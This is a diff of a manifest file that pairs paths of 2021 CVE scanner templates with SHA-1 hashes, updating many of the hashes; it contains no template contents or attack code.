+http/cves/2021/CVE-2021-31862.yaml:519fde3814ab40b76761fff54258245107d5a128 +http/cves/2021/CVE-2021-32030.yaml:e0f0dcb74cebabd2b61b9489e11dabdb24b0fc19 http/cves/2021/CVE-2021-32172.yaml:559ebeec6048e2ae5bdf1f0d06dc46b71138962e -http/cves/2021/CVE-2021-3223.yaml:d81fa30b6549c0b3d2496b587593db42d6d977f0 -http/cves/2021/CVE-2021-32305.yaml:4433650ec65cbf1a4da780e7c2e23889f6cb4b30 -http/cves/2021/CVE-2021-32618.yaml:b57260c504191810b444ea6790239f2277a248e4 +http/cves/2021/CVE-2021-3223.yaml:41777622784c8a88e32f5fd644667e187c353b34 +http/cves/2021/CVE-2021-32305.yaml:f5269312defaddb52c90bb0f3e84e7d4ac69b71a +http/cves/2021/CVE-2021-32618.yaml:a6fabb4e6b0179cbe32c63227c279641267bf8c4 http/cves/2021/CVE-2021-32682.yaml:0da80b7b40598bb068a18f80fd6c0864a832c260 -http/cves/2021/CVE-2021-32789.yaml:88c7b9f38a04c50a0a3f649283ba59cdb833b8ce +http/cves/2021/CVE-2021-32789.yaml:980c879c669a1d5dd08c2b8e5d814826a7e63558 http/cves/2021/CVE-2021-32819.yaml:f5a5a6171ec39f6c7cde28dc222803b56ddddaf1 -http/cves/2021/CVE-2021-32820.yaml:d38bab1072f1bd2f55db812a664a3935f01c0166 -http/cves/2021/CVE-2021-32853.yaml:db17a19323dd835768f4481c5c4b9adfb5da45af -http/cves/2021/CVE-2021-3293.yaml:fe12646f98d2befd3a81c7eb5ab8379999212bb9 -http/cves/2021/CVE-2021-3297.yaml:9676b296f1abe98ea169e3f687428ab8b3fa7a0a -http/cves/2021/CVE-2021-33044.yaml:c39cdfafe71c3fb7e850b61ebfac7130ba142043 +http/cves/2021/CVE-2021-32820.yaml:c1eaad0fa93d3ccc42cfdc334d2637c157437550 +http/cves/2021/CVE-2021-32853.yaml:4f5660b673337d1f87247b6a2c56ef0ca20364f7 +http/cves/2021/CVE-2021-3293.yaml:e051bb8ab71630296a68e8710267643cdeaac173 +http/cves/2021/CVE-2021-3297.yaml:e096fea29fcbc027a31f490025c0a0c09a875ba5 +http/cves/2021/CVE-2021-33044.yaml:9b0efd2e530b2be9b77a6be06b517d62d0de293a http/cves/2021/CVE-2021-33221.yaml:58293e79ffe6287682d316b46b3fe45b84102bc2 -http/cves/2021/CVE-2021-33357.yaml:8a9dd54c8d49f243bdd35a3aedda0825c98cdb87 +http/cves/2021/CVE-2021-33357.yaml:da4ee842fe6c87d4d03a743bcedc9b01e2106798 http/cves/2021/CVE-2021-33544.yaml:69108bbbaf50d5dac5de8df9603eca2b55886cf7 -http/cves/2021/CVE-2021-33564.yaml:ec5c041f5c1221e8b2797d6fcfbe8224f24ec1da -http/cves/2021/CVE-2021-3374.yaml:4cc93e651c68487454416974bd6ef2be9c65f87e -http/cves/2021/CVE-2021-3377.yaml:01dfd057cc13fc49b0c40e1d34d149d65928ae7e -http/cves/2021/CVE-2021-3378.yaml:bfd86955067e820a9293df332b73ffbbbd6f7daf -http/cves/2021/CVE-2021-33807.yaml:1ca420c421ed7fde6b486448642b65b71db7afc5 -http/cves/2021/CVE-2021-33851.yaml:561bf7caf63671ce1465f665a66647d77e7c43c3 -http/cves/2021/CVE-2021-33904.yaml:08c90f824d6d9afecbb88f06addf2d635828b91d -http/cves/2021/CVE-2021-34370.yaml:57c1bd4c1ae141bdc2f79650b032735e201a51bc +http/cves/2021/CVE-2021-33564.yaml:2862f42ab7ad49d699926d7c33d12281961fe8d6 +http/cves/2021/CVE-2021-3374.yaml:a6f3c84112d7b5587d8afa4c75c13eaeab95c39a +http/cves/2021/CVE-2021-3377.yaml:83deb7193d0869948c425a089f4e237ba41506f6 +http/cves/2021/CVE-2021-3378.yaml:06aa73bc4738d2ac8ec4f61948a91ac4ac574423 +http/cves/2021/CVE-2021-33807.yaml:b6916f1696c8724b2c3df883da927d4a337d36a2 +http/cves/2021/CVE-2021-33851.yaml:d0172184328cb843b1e01e89c5357eb1a93b333b +http/cves/2021/CVE-2021-33904.yaml:d7bd1c3ed8b30a63fb71036c9e8e955ef2322392 +http/cves/2021/CVE-2021-34370.yaml:e737f926b3a3224b384212a10a695a2b92495b42 http/cves/2021/CVE-2021-34429.yaml:1e500f89ab3a149f86e51e7c1700a3a890375ab3 -http/cves/2021/CVE-2021-34473.yaml:776cef278cb39a8f91c417fafb50e16475d2e541 -http/cves/2021/CVE-2021-34621.yaml:08c9c81fd04ccf9bf72f328e4082c0db60d4e0e6 -http/cves/2021/CVE-2021-34640.yaml:a302f7b728faca5c60d42f6494b08d9591ce0467 -http/cves/2021/CVE-2021-34643.yaml:4a2c6f0b7d4f81cf62fce1589ff430a6337f9794 -http/cves/2021/CVE-2021-34805.yaml:96dc6a9e45f3f66aea3e654fe493989ad0b3b3f7 -http/cves/2021/CVE-2021-35250.yaml:9651c40f03d87658110f9ec426f96939ee30ea37 -http/cves/2021/CVE-2021-35265.yaml:4c0b33b17f7245e47e7ed2007db479403ff2e822 -http/cves/2021/CVE-2021-35323.yaml:64d8eb3d1ca6f279ff21be9f9de13a1de0a36f31 -http/cves/2021/CVE-2021-35336.yaml:5073e8b84d9cba4f77f4076a84f788a0456f78e0 -http/cves/2021/CVE-2021-35380.yaml:eebf85e334db98bd4a02e92d652aea0e58c99ab1 +http/cves/2021/CVE-2021-34473.yaml:9f16890216c11c9f4bdddb6a37ad3a2f782e4ada +http/cves/2021/CVE-2021-34621.yaml:201fe540245e5c381e5737b793f6d3f85e78200d +http/cves/2021/CVE-2021-34640.yaml:4f2c41c7944348bca0598917bcb902660c128647 +http/cves/2021/CVE-2021-34643.yaml:70c479b5b9d9ffacf2dc32f43704b229aa5f344e +http/cves/2021/CVE-2021-34805.yaml:40a0690828d4b1e32b7c36cbc076109e204cc82f +http/cves/2021/CVE-2021-35250.yaml:b180e32fe840589cb446ea04b7e85b5d916a6f3d +http/cves/2021/CVE-2021-35265.yaml:d353f5a6df67d357bdc92273bcd5c333c9ccec34 +http/cves/2021/CVE-2021-35323.yaml:70922d402cccb0e9f67e79d6d7032ec32419fc53 +http/cves/2021/CVE-2021-35336.yaml:cab93d1131529fec394b9cd1d83cc4bd99d32df0 +http/cves/2021/CVE-2021-35380.yaml:b36ec850edb7dce7aae65e2775c1e41c850db7a3 http/cves/2021/CVE-2021-35464.yaml:3c3d0aaee18f1c8db95691e2ea5b461a187b5390 -http/cves/2021/CVE-2021-35488.yaml:e4b87e9f9664915a4d420bbf78068453ad425bdd +http/cves/2021/CVE-2021-35488.yaml:35844183d74f70a35d39916531bfb8d943de46d1 http/cves/2021/CVE-2021-35587.yaml:3ef67166af9bf28b3e19db5f099d8b81bd9df83b http/cves/2021/CVE-2021-3577.yaml:e466c8eb6354cd67df3e9dd539c03cd2273140c8 http/cves/2021/CVE-2021-36260.yaml:7dc597bf9fa769ec45781645476a6495850217e7 http/cves/2021/CVE-2021-36356.yaml:5557bae6de949673b6cb15b5053c535b303da749 http/cves/2021/CVE-2021-36380.yaml:5d30c9dda9de0484751e8641267a15635ffa7046 http/cves/2021/CVE-2021-36450.yaml:af11e0bd87bddec4ac011b891dc66e80818e1a72 -http/cves/2021/CVE-2021-3654.yaml:7cbe3b4e43ec3b6b3c0af29624be5675e10588cb -http/cves/2021/CVE-2021-36580.yaml:2259521b2373c3d82289580380f052e62848be55 -http/cves/2021/CVE-2021-36748.yaml:efc2c1f6719891dcd405e38aa5bd00a646540ba4 -http/cves/2021/CVE-2021-36749.yaml:6262987ed6445918863fbe24748b3abdeb7ffbbd -http/cves/2021/CVE-2021-36873.yaml:8835633ff518315e6cc68b67edf8adae9d21e4dc -http/cves/2021/CVE-2021-37216.yaml:779c9c72d84bdd1928ba011f1f3332fad53d6c78 -http/cves/2021/CVE-2021-37304.yaml:91e6378160d5c18d9d993ce119b08b4c17f92d88 -http/cves/2021/CVE-2021-37305.yaml:6079931974eb5fbfc3c6bb18fd1bb64c54ab0d84 -http/cves/2021/CVE-2021-37416.yaml:22b0dae2f46827599e930fa85fde0a9ad5de3b10 -http/cves/2021/CVE-2021-37538.yaml:489947129408f62d787eca7a9ff8ead0b6d4fca5 -http/cves/2021/CVE-2021-37573.yaml:59e475ed3c201acfe4f53db5c2103ff068b08581 -http/cves/2021/CVE-2021-37580.yaml:7120b10609ca28e4252017b4d06c76f04051a3a5 -http/cves/2021/CVE-2021-37589.yaml:60b0cfe9392118b3daa04f3448790e7c65828227 -http/cves/2021/CVE-2021-37704.yaml:2642e05b606ac3213788b2b65919e36381407e2d -http/cves/2021/CVE-2021-37833.yaml:876819cd27ac82a25a87bd04d242a71cf0d73583 -http/cves/2021/CVE-2021-38314.yaml:cd4cbf230fc0d0ad6c4a7154d6114c0260237b3b -http/cves/2021/CVE-2021-38540.yaml:e1ba7a8281ddffa477b3a20f61e9d0c71fc3c238 -http/cves/2021/CVE-2021-38647.yaml:76fdd9fc515e024f414dd99d14f2b73b6575a495 -http/cves/2021/CVE-2021-38702.yaml:22f5556b762b49543386beb06f1c32737be81f5e -http/cves/2021/CVE-2021-38704.yaml:63165e95321c328d1c38650799f11e138cbc9dc7 -http/cves/2021/CVE-2021-38751.yaml:0bfabef0962da852ab753ade7a26693e47f192f6 -http/cves/2021/CVE-2021-39141.yaml:4846468813990a1d6b5c9a306d07305ebd0ff556 -http/cves/2021/CVE-2021-39144.yaml:a57b20f7d12ac8485692d4d18665cbbb9b1781b0 -http/cves/2021/CVE-2021-39146.yaml:a5cabcdf8d780b2f1c745252e0cfa7a1bef26d29 -http/cves/2021/CVE-2021-39152.yaml:369ef02266ecf920292231d2f4d3dc9ae631cb4b -http/cves/2021/CVE-2021-39165.yaml:1bc4d0453511c49d294caa4a1419d57ec8fde218 -http/cves/2021/CVE-2021-39211.yaml:c68e2ab612b3aa2a2751ca23fb11813fc70c96e8 +http/cves/2021/CVE-2021-3654.yaml:e12b8087a2d251e1beac8b5947a51e2131d42cfc +http/cves/2021/CVE-2021-36580.yaml:b65041f1d61445ccb07dbc7cf6d840d4077effac +http/cves/2021/CVE-2021-36748.yaml:bd4f63d34b83edcd6e9436daf4717863fc0a1365 +http/cves/2021/CVE-2021-36749.yaml:c1951c8ba634ec8b733a755cf181ef506cf4c275 +http/cves/2021/CVE-2021-36873.yaml:826ac9ad5fa70d5716adebeaa9cab3b0ee41339a +http/cves/2021/CVE-2021-37216.yaml:67c6077fdfdd803838654ba95d42ba5360e5da70 +http/cves/2021/CVE-2021-37304.yaml:b4ea2c3c5dc59d2f84aacec028b33b5c03fc0bd4 +http/cves/2021/CVE-2021-37305.yaml:b74e3de4d0a717dec630f8570f2d01ff959782e3 +http/cves/2021/CVE-2021-37416.yaml:dca4e121da72fd29785495a144152bfb3ab4bf99 +http/cves/2021/CVE-2021-37538.yaml:b1af77660e16ff8d3c8921e757c59c47c037f73c +http/cves/2021/CVE-2021-37573.yaml:81364e3ed992eaf1c9c8490dc6fc96e86b458eee +http/cves/2021/CVE-2021-37580.yaml:9557ae7a7d3c5c5063e5625a7e5056b4636e8e16 +http/cves/2021/CVE-2021-37589.yaml:cf64c642b71cd0e1592840010191c8464efdc481 +http/cves/2021/CVE-2021-37704.yaml:26ac10a58b11a6678832d7df0db3c9b2e20805cf +http/cves/2021/CVE-2021-37833.yaml:0d1fc8f8a5791ed37eda783d1025e1153890c9c3 +http/cves/2021/CVE-2021-38314.yaml:6e55a0df5415850bfd0956d7960cbd6f857b1cab +http/cves/2021/CVE-2021-38540.yaml:bcc9c608f708a69004ecd31e43bf1eaccd827fcb +http/cves/2021/CVE-2021-38647.yaml:f5c51e8c335b944aadfb1c573d59b18373417155 +http/cves/2021/CVE-2021-38702.yaml:133e01391a40ab7a3c8c85abaeb205825d4f0d8d +http/cves/2021/CVE-2021-38704.yaml:2034b24edeb032557a9fa1d246a9edd80626c000 +http/cves/2021/CVE-2021-38751.yaml:cfc25aa5a34e8f8f7f83b79a3d3eb40ebb4fde76 +http/cves/2021/CVE-2021-39141.yaml:d1aed5834f978e008646d3b639a5d705a33b07cb +http/cves/2021/CVE-2021-39144.yaml:dc820984b37a0c113a30de65768aeec9ba4f7d08 +http/cves/2021/CVE-2021-39146.yaml:587a21c81176bd871f0cfcf5a15dd3c711076018 +http/cves/2021/CVE-2021-39152.yaml:5f81b57ecf652ac0c14ca84838775fc033487eb2 +http/cves/2021/CVE-2021-39165.yaml:2bc4db779098bb8a10a2f828813a4c50d1bd6c95 +http/cves/2021/CVE-2021-39211.yaml:08f33175b17d7ff56797dd7b8853853ac0753efc http/cves/2021/CVE-2021-39226.yaml:ff5d75b85ad52f65e7ad7c11b6840920f537a9a4 -http/cves/2021/CVE-2021-39312.yaml:df533e76c00e20f0a8c9f5482593f9574e432516 +http/cves/2021/CVE-2021-39312.yaml:1b8caa1886c4ad040accea29935ccc1e166d94d6 http/cves/2021/CVE-2021-39316.yaml:a8afec709b1e6c85a04f1af4cb469f5a12ab1613 -http/cves/2021/CVE-2021-39320.yaml:6ecdb43dcade7a498ea7ec6f592e59e3c8be872b -http/cves/2021/CVE-2021-39322.yaml:087aa9a5dda4948e709e6322addec46f8d4e3a25 -http/cves/2021/CVE-2021-39327.yaml:1a9b8146b636797b79547774e8847c0bccccd6dc -http/cves/2021/CVE-2021-39350.yaml:4af2088df37ca3cddd2c62f5f15cd11a5b90ba07 -http/cves/2021/CVE-2021-39433.yaml:8959846d53aab273f137e5d437021370aab41fd2 -http/cves/2021/CVE-2021-39501.yaml:38040a8064182709d3f0120316140dfd4eb93653 -http/cves/2021/CVE-2021-40149.yaml:cf8ca1c339e5e9560661315263120dcb7ace4fc8 -http/cves/2021/CVE-2021-40150.yaml:6094d0dd8fe6c12156e4a7ded00c12c5bf87a57a -http/cves/2021/CVE-2021-40323.yaml:4b959af2a0d911528111feb11fc156acc7ae5999 +http/cves/2021/CVE-2021-39320.yaml:50a0513a8c05c2fc1742d5f20f4c7ea11b294c1d +http/cves/2021/CVE-2021-39322.yaml:f00fffcddf8bb3bfeab5af178bdad72177072d20 +http/cves/2021/CVE-2021-39327.yaml:2e6cb2fa3ed9db34cf7936dc830665e4ae1c984b +http/cves/2021/CVE-2021-39350.yaml:25734d4e8cfb767f878006e4420bc9f8f58f2463 +http/cves/2021/CVE-2021-39433.yaml:a3f41eb5c9b834ef344908fda6f31645e659efb1 +http/cves/2021/CVE-2021-39501.yaml:31aed7c507e77bb2e327f2617e584359800199c7 +http/cves/2021/CVE-2021-40149.yaml:229a604232c285e8b0f01d715358f639df5a9bba +http/cves/2021/CVE-2021-40150.yaml:f49e7c52e26c818fd324c6fba0fab99ef927d6a4 +http/cves/2021/CVE-2021-40323.yaml:884ced0b39793e3d260fef184d2f133640389a70 http/cves/2021/CVE-2021-40438.yaml:4e949b6c849179a1365d4425d46b7aec0c6bc59b http/cves/2021/CVE-2021-40539.yaml:9d4f1b172f4d8e5ee0ffcb361f6a243fe39293b6 -http/cves/2021/CVE-2021-40542.yaml:4f6b3549fc01bc12825094e123eb8ef5fc1bfee2 -http/cves/2021/CVE-2021-40661.yaml:03cba304ffdd3276fa2bfa2eaf8308aaa2cbe436 -http/cves/2021/CVE-2021-40822.yaml:d1205ed130a62646bb95df75671af3d06a8ed76d -http/cves/2021/CVE-2021-40856.yaml:0aa061da9299e61a0b5d0ee5c3fd2d39865c6248 -http/cves/2021/CVE-2021-40859.yaml:ea52748a6e9b2d1cc9dd8f463c05058385b4eabd -http/cves/2021/CVE-2021-40868.yaml:57e0e2aa083102e4fce28cc10c2dce4e44d8e7fb +http/cves/2021/CVE-2021-40542.yaml:f7bfe927d9ceea82504e055d0f370bdd27ec67ce +http/cves/2021/CVE-2021-40661.yaml:a16440826beb677b681f8bbd2b155c150d389002 +http/cves/2021/CVE-2021-40822.yaml:05bed54611e8e5df4d2388c8733612b428be3957 +http/cves/2021/CVE-2021-40856.yaml:5a4387f033ba0fabfd148e4a9dd8fcd9a1a561e8 +http/cves/2021/CVE-2021-40859.yaml:bdb10644e52250605d069d3b73cec322256311a0 +http/cves/2021/CVE-2021-40868.yaml:e5c6ad43f77260c99b2fa859bdf650ad8c4f1b01 http/cves/2021/CVE-2021-40870.yaml:8fe01d9652fadc620a5273532c403e836848a360 -http/cves/2021/CVE-2021-40875.yaml:497098ea66d6c95fea53145cb344abb31b027471 -http/cves/2021/CVE-2021-40908.yaml:9eb4b0d1b9e01174e901808544993f6d1c182059 -http/cves/2021/CVE-2021-40960.yaml:7ffffe236cb0ef192c64234274abc10889fd02da -http/cves/2021/CVE-2021-40968.yaml:211bb38c2e905e52587da5539ebcd19108a73ee1 -http/cves/2021/CVE-2021-40969.yaml:ffc24d76dd812c24e678b4e5eb5d612e075d2af6 -http/cves/2021/CVE-2021-40970.yaml:0f426718a6f49dd7b9e29ef2883c45588ba53c6e -http/cves/2021/CVE-2021-40971.yaml:86af5d3d84970ec3dacb2aff73d7596cea9a8ca1 -http/cves/2021/CVE-2021-40972.yaml:e276c96400b9e509111d6804ce55c428884038e0 -http/cves/2021/CVE-2021-40973.yaml:5e992d1e0c01350270180b9121b0ec9cf4a7db01 -http/cves/2021/CVE-2021-40978.yaml:ccb20636298749f3f04d374c1a7fa2e2c41adcb9 +http/cves/2021/CVE-2021-40875.yaml:7f0ccfb70a04e77f4370504e044718e4ddc06dc1 +http/cves/2021/CVE-2021-40908.yaml:bf8387f821c890e1ff40835b346c92597d0e445c +http/cves/2021/CVE-2021-40960.yaml:21a4c9b9a84ea33847da7501f30d69d1dc26cb54 +http/cves/2021/CVE-2021-40968.yaml:99ed2fe3be6404d48a460e9101798a268d86cad8 +http/cves/2021/CVE-2021-40969.yaml:2b901c8d0527daeed0a84c084ce4036511fd4ba0 +http/cves/2021/CVE-2021-40970.yaml:4a4568066bcd94e8268fd7564754bac9b9635527 +http/cves/2021/CVE-2021-40971.yaml:892ddd030bf04847ea5434a40ee74eea91c7647f +http/cves/2021/CVE-2021-40972.yaml:311d4ad95b53fae5479664393af2d9a46024ddc5 +http/cves/2021/CVE-2021-40973.yaml:b17d2ba3e63cee551e9ee7334bb47529260ffb27 +http/cves/2021/CVE-2021-40978.yaml:2905cd534d1f59133edb7980e86f8c97972f68e6 http/cves/2021/CVE-2021-41174.yaml:7547fe17ee821a1d3a56f1ccfffdb16dedadebaf -http/cves/2021/CVE-2021-41192.yaml:795aaa0791f4d58d758b1f05a9af48de39e0057b -http/cves/2021/CVE-2021-41266.yaml:c8888146e925e7766c9d4e38bccb72681afefda9 -http/cves/2021/CVE-2021-41277.yaml:8038ead355ead51fa379af3704893b6b82609b6b +http/cves/2021/CVE-2021-41192.yaml:3fc4a07c55ca1768da09e327a863db829da7c749 +http/cves/2021/CVE-2021-41266.yaml:29e8dd328bc8bf3e053dd17daf004a00a5cf5528 +http/cves/2021/CVE-2021-41277.yaml:aa2cdc5ec4cf3a813a45e4c5ab2f75bb3c81d9f6 http/cves/2021/CVE-2021-41282.yaml:ba1db9f21b1b6a4e10e9be853ba4c254b57cf7e8 -http/cves/2021/CVE-2021-41291.yaml:ae5ff67f779304839c4907fa90e75081b5192164 -http/cves/2021/CVE-2021-41293.yaml:80f56bc5ed498169277094514920c7c9f7a7c383 +http/cves/2021/CVE-2021-41291.yaml:5c215a22d3396ced71913e8d4c552ce7f5dd8a78 +http/cves/2021/CVE-2021-41293.yaml:adb85876624d3502af0ec8f01591e8c9ce192471 http/cves/2021/CVE-2021-41349.yaml:9b1345cad11c48a496eef94a88abebbea14dea67 -http/cves/2021/CVE-2021-41381.yaml:53f993fcfe16e9f270d9e001638a74b78db3e7bd -http/cves/2021/CVE-2021-41432.yaml:7d2502a9660de35660d4735a21586676af9b1129 -http/cves/2021/CVE-2021-41460.yaml:eebf7b134fbbaec4a3ebc905c76ffb8d02a56ee9 -http/cves/2021/CVE-2021-41467.yaml:df27d0a47098de1859f723ebfb0a71f9356bff07 -http/cves/2021/CVE-2021-41569.yaml:ced55626d317c515596b818fda75be3eeebfa464 -http/cves/2021/CVE-2021-41648.yaml:cce7a3376e0f20f2d49c20f1b46a481a1227d47f -http/cves/2021/CVE-2021-41649.yaml:32bdf974505c0c1df424a58cf1ccb29f43e6007d -http/cves/2021/CVE-2021-41653.yaml:411252dd20341299aac656f9724954c7ea1b7394 +http/cves/2021/CVE-2021-41381.yaml:3cb4d2c094b227894749f7c9966547a70eef84af +http/cves/2021/CVE-2021-41432.yaml:45f27b768747fc1f46b191dac1ddb4011b9102b7 +http/cves/2021/CVE-2021-41460.yaml:e4eb2386356addede6d74a5b6e32c0a87787aef4 +http/cves/2021/CVE-2021-41467.yaml:745e078902e48c6d577e43fa50dc4c8f59d395b8 +http/cves/2021/CVE-2021-41569.yaml:58ae8fb03d67f7497e8f48199f6a759110c464b5 +http/cves/2021/CVE-2021-41648.yaml:1173b22c6cff3c98af6c10af791fb5cd9dc93452 +http/cves/2021/CVE-2021-41649.yaml:6ef3083424f3d60985669e6c82a8c721e4914604 +http/cves/2021/CVE-2021-41653.yaml:0ceacd5d8e1456b38e9f136c205c8b89376d27c5 http/cves/2021/CVE-2021-41691.yaml:f598a63d2feec552cd0f7a482d63d3cb99b880f2 -http/cves/2021/CVE-2021-41749.yaml:183180ac5ba54b505f3e029e158a38345ceb58b4 +http/cves/2021/CVE-2021-41749.yaml:c1ca405d187075f2afacfd5fecf6fbc2d2621749 http/cves/2021/CVE-2021-41773.yaml:0e29ba034de4f0b00bb3e2a598ebe81b550e79dd -http/cves/2021/CVE-2021-41826.yaml:7e87da7d3ef21740e18566dbbe739bf9c0013d71 -http/cves/2021/CVE-2021-41878.yaml:1e77058615e78785c998ec79e3072b1a306296c7 -http/cves/2021/CVE-2021-4191.yaml:a3d44c0a0ecdfd7816a29fa98bf130b21903442e -http/cves/2021/CVE-2021-41951.yaml:659b0f3f34ec82851aedcaee2fe8b23949494a7b +http/cves/2021/CVE-2021-41826.yaml:337f0af9047eeb48350aed4b4775d20697db4def +http/cves/2021/CVE-2021-41878.yaml:b10795f7dbfb29f536c8a959cf193064d3e730ff +http/cves/2021/CVE-2021-4191.yaml:615fec89c75dd9155866752822d33077ecd6119e +http/cves/2021/CVE-2021-41951.yaml:62d83e7a59a67814bac4de9b33c19b48211a80fd http/cves/2021/CVE-2021-42013.yaml:44fa46e480c66a8f06f3ec5ecb0cac2b2c8df147 -http/cves/2021/CVE-2021-42063.yaml:74807407f2d1967c328209e05b0f41ba0921e42a -http/cves/2021/CVE-2021-42071.yaml:5c8920e30937fcaedf57e21e4305b15189739b02 -http/cves/2021/CVE-2021-42192.yaml:49a79f2cd0037eab15a92c415e85f977701e75e3 +http/cves/2021/CVE-2021-42063.yaml:cd52268254458ff5d04a877fb4d0e584a0104fa1 +http/cves/2021/CVE-2021-42071.yaml:26fe08872e3ec421edf96ffe62b85f2ba24530ee +http/cves/2021/CVE-2021-42192.yaml:b5303014a9620cd64a7961296d5168aaa86165db http/cves/2021/CVE-2021-42237.yaml:7eeabe14b1aced22e9b241da12e0173a5f5960b1 http/cves/2021/CVE-2021-42258.yaml:23de3ad8ab4952f1916c476510102298e30bb38b -http/cves/2021/CVE-2021-42551.yaml:f44811d8882481070bfb9214cd6b13884a4550a2 -http/cves/2021/CVE-2021-42565.yaml:731bf86e852f0636c5d44fc591161ed551a8c8dd -http/cves/2021/CVE-2021-42566.yaml:036fab572dcb86a87a35aaae6766e6d8a3ed368b +http/cves/2021/CVE-2021-42551.yaml:bcb3046b0674da67c7c9e7695ec267e1fc29d5c4 +http/cves/2021/CVE-2021-42565.yaml:c3a3d4cf0f0c8b682054567b794e8f9b58733388 +http/cves/2021/CVE-2021-42566.yaml:ba16e90359a0514e3a470bf8176596d35b47deb4 http/cves/2021/CVE-2021-42567.yaml:0d49b0b93e150c64e366180fa5a56133de5872fd -http/cves/2021/CVE-2021-42627.yaml:365df969a629f0a8ce3a4bff07a6b0dc5c014d2a -http/cves/2021/CVE-2021-42663.yaml:06dec4751b1bd43ce1855af5f6a891b5ce657557 -http/cves/2021/CVE-2021-42667.yaml:97881054f7f4e3f698bb70308363a86369e22298 -http/cves/2021/CVE-2021-42887.yaml:afcc9b524e202b7b401a2ad4a519977b946c7a9f -http/cves/2021/CVE-2021-43062.yaml:9d723d09d548b38ee5cc69c3ff0ac8bfb78a002b -http/cves/2021/CVE-2021-43287.yaml:532f25b74040db2f6c4b0973e9e7a4258cf57f4b -http/cves/2021/CVE-2021-43421.yaml:dfdbfce83cef90d7f67c73c3b10fc94ff96d544f -http/cves/2021/CVE-2021-43495.yaml:2abd4e74ce4281a3aa8f4a7e1d6f98bb09ab3e53 -http/cves/2021/CVE-2021-43496.yaml:1eb391c0c397df0abb60b636627b916a69073af6 -http/cves/2021/CVE-2021-43510.yaml:c9109aa9ac3d581863b0de65852f24d4518eb077 -http/cves/2021/CVE-2021-43574.yaml:51c4e043ab40b6bbc8092ac77908eb3df24f008b -http/cves/2021/CVE-2021-43725.yaml:3a45f822f84a5c6ad6b3d328233a10a2aa54464a -http/cves/2021/CVE-2021-43734.yaml:603d58a669450f131bc64de45b63dafe536ed890 +http/cves/2021/CVE-2021-42627.yaml:f9e2715dd77c6199fd99d8126220b62c0995c1c3 +http/cves/2021/CVE-2021-42663.yaml:2f292f6ef58ad508e1bafec9ca0ae9c0dd5c5dd1 +http/cves/2021/CVE-2021-42667.yaml:9576363786a0b9965098b90e65d8c0b0915c5fea +http/cves/2021/CVE-2021-42887.yaml:fd45f06e81ed2e61d325a149ee820043a4e6a86a +http/cves/2021/CVE-2021-43062.yaml:6458590361aaa3c539c4c76d4764fda2160dade9 +http/cves/2021/CVE-2021-43287.yaml:be3e5cce7eef94a21f653bc8a8d724e92eae707c +http/cves/2021/CVE-2021-43421.yaml:fa901a9e24ea21c7830c1c5ffaf8e6be56165150 +http/cves/2021/CVE-2021-43495.yaml:987ce35bf21677f0dcd6ee397de1f9a84c564837 +http/cves/2021/CVE-2021-43496.yaml:7ce63edaae73a8bd7b108b25d050b8dc74ad4caa +http/cves/2021/CVE-2021-43510.yaml:a2c5862075cd95117242abf2ed1ec8ff0bccacfd +http/cves/2021/CVE-2021-43574.yaml:c534555eb3baa727387a3af772332d9550a2110c +http/cves/2021/CVE-2021-43725.yaml:2dd0ed40ecc1ce7983b93e13af08547f03cb26ec +http/cves/2021/CVE-2021-43734.yaml:f299f6f3581a4896f4b085f47834418b266f406b http/cves/2021/CVE-2021-43778.yaml:6e912dce582c13bae8c9cd7afb634bd51317fadd http/cves/2021/CVE-2021-43798.yaml:3d7503bf0c0e0bd04fb7383646650303c97ada06 -http/cves/2021/CVE-2021-43810.yaml:10008a82f19f5ea85d69a67350199c2db1b76c5b +http/cves/2021/CVE-2021-43810.yaml:c9b29fc0e77a1539ba18f9c5367bbaac1d9ba044 http/cves/2021/CVE-2021-44077.yaml:6bbe45822ce7006a038f1a3dc63b3c5821367861 http/cves/2021/CVE-2021-44138.yaml:b35e2cdda62c7b0f03c0f891a302e498c903cf2b -http/cves/2021/CVE-2021-44139.yaml:dc1dfa1d375c055d39b84b387dc3e5d9079e752a +http/cves/2021/CVE-2021-44139.yaml:418e91f1b9b15465685c335325d5ced401ea27a8 http/cves/2021/CVE-2021-44152.yaml:e712a65b4a0d6d13091a33837b4febead2db33cc http/cves/2021/CVE-2021-44228.yaml:6eb6622e6e51e3f3544ff5a95190f4c1bd1a3376 -http/cves/2021/CVE-2021-44427.yaml:627637f03a2a608df0521fd52617340de69c0f0f -http/cves/2021/CVE-2021-44451.yaml:1439b270d57a7afd9aa7c4263022e2be6306061e -http/cves/2021/CVE-2021-44515.yaml:d03c4e4935cac69f749c0d9d7a4eb3b109a6d828 -http/cves/2021/CVE-2021-44528.yaml:6decac3166c71ce069c332f56928e3b826859827 +http/cves/2021/CVE-2021-44427.yaml:092a813b3b8839841966bf40e62ff7205c6a24d2 +http/cves/2021/CVE-2021-44451.yaml:898a7c00c68480b54bb1c0d427a8a9b23c274755 +http/cves/2021/CVE-2021-44515.yaml:f5b61c25e7f8c290464772345a1316d44480d150 +http/cves/2021/CVE-2021-44528.yaml:a517bf36f0b3ea568ca106d1c5ea1c6c05b5e288 http/cves/2021/CVE-2021-44529.yaml:7ec07b38ec27517f7b772f35255082520c542bb4 -http/cves/2021/CVE-2021-44848.yaml:5d4a2b72e9a6227c2813dfbf9c44a9922d72e24c -http/cves/2021/CVE-2021-45043.yaml:410c5f202c220f246687d9865f3492ac28c461a3 +http/cves/2021/CVE-2021-44848.yaml:481b863bc66fbca233f0ee74b8f692a6f4a47317 +http/cves/2021/CVE-2021-45043.yaml:6e3e3c3db22102343ada4a5853e7cabee4822a43 http/cves/2021/CVE-2021-45046.yaml:e3b66473cd5e4259f8ecac9807f4ca3bbd9021d8 -http/cves/2021/CVE-2021-45092.yaml:5b7ca031677ded6a18b23bb1203ea93228d6e817 -http/cves/2021/CVE-2021-45232.yaml:d5ecece430ca8a7b0dbc1a505dad86146152e993 -http/cves/2021/CVE-2021-45380.yaml:12ea29db250b823a37cd5c63f6be3aaa9b13d257 -http/cves/2021/CVE-2021-45422.yaml:4c35230fffe5264c6848b9ac01c9b3fc0c72ec76 -http/cves/2021/CVE-2021-45428.yaml:3c96aecbc10fdf4d70368298a2ef8d00bda35f28 +http/cves/2021/CVE-2021-45092.yaml:2d4c8ed335cebf91f6f14bb45020ae5bbf8f8aaf +http/cves/2021/CVE-2021-45232.yaml:e2d26a7c22b6502d71042d94bfd963091b2d795f +http/cves/2021/CVE-2021-45380.yaml:c9968ad2ba4a93c5310c501cc138b876154aa8d7 +http/cves/2021/CVE-2021-45422.yaml:4038b8088e5e3f143ef400c9eae36aaa25f7e2e5 